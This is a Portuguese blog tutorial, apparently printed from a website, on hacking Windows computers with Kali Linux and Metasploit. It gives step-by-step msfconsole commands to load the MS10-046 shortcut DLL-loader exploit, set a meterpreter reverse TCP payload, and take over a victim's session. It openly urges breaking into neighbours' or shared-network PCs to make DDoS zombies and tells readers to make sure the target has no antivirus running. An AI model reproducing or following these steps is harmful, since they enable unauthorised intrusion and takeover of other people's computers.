Você está na página 1de 7

11/04/2017 como 

hackear um computador com Kali Linux

Aprenda  técnicas  rápidas  e  simples  de  invasão,  como


invadir qualquer computador Windows usando Metasploit.

Vamos  invadir  uns  computadores  por  ai?  Essa  é  a  minha  proposta!  vamos  aprender  e  invadir  a
vontade,  acho  que  a  segurança  na  informação  só  vai  ser  levado  mais  a  serio  para  os  usuários
quando tudo começar a virar um caos.

Eu proponho invadir computadores pessoais e transforma­los em zombies para fazer deles o que
bem  intendermos.  A  segurança  de  informação  é  quase  nula  quando  se  fala  de  computador
pessoal, isso devido a falta de informação que muito usuários tem, muito acham que basta instalar
um ant­virus e pronto, estamos seguros, mas a realidade pode ser bem diferente.

Vamos pensar em uma rede, uma rede fechado, quem sabe a de uma lan house ou a rede do seu
vizinho, você pode invadir o wifi dele (veja como fazer aqui) e a partir dai pegar as informaçães
que precisar.

Por que invadir um computador?

Entre  os  mais  variados  motivos  pessoais,  existem  os  motivos  não  pessoais,  um  computador
zombie  pode  servir  para  fazer  ataques  DDOS,  ponte  para  outros  ataques  e  nos  mais  variados
casos para dar views a um site.

O que é o Metasploit?

Metasploit  Project  é  um  projeto  de  segurança  de  computador  que  fornece  informações  sobre  as
vulnerabilidades de segurança e auxiliares em testes de penetração e desenvolvimento.

Seu sub­projeto mais conhecido é o de código aberto Metasploit Framework, uma ferramenta para
o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto.
Outros  sub­projetos  importantes  incluem  o  Banco  de  Dados  Opcode,  arquivo  shellcode  e
pesquisas relacionadas.

O Metasploit Project é bem conhecida por suas ferramentas anti­forenses e de evasão, algumas
das quais são incorporadas ao Metasploit Framework.

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 1/7
11/04/2017 como hackear um computador com Kali Linux

Como hackear um computador?

Para fazer a invasão no computador você vai precisar de alguns pré requisitos, eles vão facilitar a
invasão e transformar as coisas mais simples.

1. estar na mesma rede
2. utiliza e conhecer muito bem o framework metasploit
3. Kali linux (ou qualquer outra distro que tenha o metasploit)

Msfconsole é de longe a parte mais popular do Metasploit Framework, e por boas razões. É um
dos mais flexível, rico recursos.
Msfconsole  fornece  um  prático  tudo­em­um,  interface  para  quase  todas  as  opções;  é  como  um
balcão único para todos os seus sonhos de exploração.
Para iniciar msfconsole, digite msfconsole na linha de comando

msfconsole

agora,  depois  de  obter  o  prompt  de  MSF  digite  o  comando  abaixo  e  olhar  para  o  módulo
de exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

Aqui  acima  módulo  explora  uma  vulnerabilidade  na  manipulação  de  arquivos  do  Windows  de
atalho (.lnk) que contêm um recurso de ícone apontando para um malicioso DLL.Esse módulo cria
um  serviço  WebDAV  que  pode  ser  usado  para  executar  um  payload  arbitrário  quando  acessado
como um caminho UNC.

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 2/7
11/04/2017 como hackear um computador com Kali Linux

Agora,  uma  vez  que  tenhamos  encontrado  o  módulo  desejado,  vamos  utilizar  esta  façanha,
digitando o comando a seguir.

msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Agora,  uma  vez  que  a  exploração  é  carregado  vamos  definir  a  carga  útil  para  o  acima
selecione  exploit.  Em  nosso  cenário  estará  usando  payload  TCP  inversa.  Digite  o  comando  a
seguir para definir carga útil.

A  carga  útil  é  o  código  que  queremos  do  sistema  para  executar,  selecionado  e  entregue  pelo
Framework. Um shell reverso é uma carga que cria uma ligação a partir do computador de destino
de  volta  para  o  atacante  como  um  prompt  de  comando  do  Windows,  enquanto  uma  shell
ligamento é uma carga que "Liga" uma linha de comandos para uma porta de escuta na máquina
de destino, que o atacante pode se conectar.

#msf > set payload windows/meterpreter/reverse_tcp

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 3/7
11/04/2017 como hackear um computador com Kali Linux

Agora é hora de fazer algumas configurações para o Exploit / carga útil que acabamos de definir.
digite o comando dado

#msf > show options

Você deve ficar abaixo de saída padrão.

Agora temos que definir o host local para ouvir. Digite o dado abaixo dois comandos.

#msf > set SRVHOST  192.168.31.20

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 4/7
11/04/2017 como hackear um computador com Kali Linux

Este será o seu IP HOST metasploit endereço de corrida.

#msf > set LHOST 192.168.31.20

Este será também o seu endereço de IP host executando metasploit.

Agora, verifique se a configuração do aplicado acima é aplicada.

#msf > show options

Agora, finalmente, vamos começar a explorar. Execute o comando Exploit.

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 5/7
11/04/2017 como hackear um computador com Kali Linux

#msf > exploit

Uma  vez  executado,  devemos  "Servidor  Iniciado"  (Certifique­se  de  que  o  servidor  não  está
executando qualquer serviço da web na porta 80)

Em  qualquer  máquina  cliente  simplesmente  abrir  o  Internet  Explorer  e  tentar  abrir
http://192.168.31.20

Nota: ele vai dar o seu um pop­up pedindo a permissão, clique em Permitir e Certifique­se de que
você não tem nenhum antivírus em execução no PC de destino.

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 6/7
11/04/2017 como hackear um computador com Kali Linux

Você  pode  verificar  o  número  de  sessão  conectada  bem  sucedido,  executando  os  sessons  de
comando no console do MSF.

Agora,  como  podemos  ver  que  temos  uma  vítima  ligada  seu  tempo  para  acessar  o  sistema.
executar a sessão de comando ­i 1.

#meterpeter > session ­i 1

Uma vez conectado comando tipo linux para navegar dentro do sistema e tem total controle sobre
ele.

http://sobrecodigos.esy.es/como­hackear­um­computador­utilizando­as­ferramentas­do­kali­linux/ 7/7

Você também pode gostar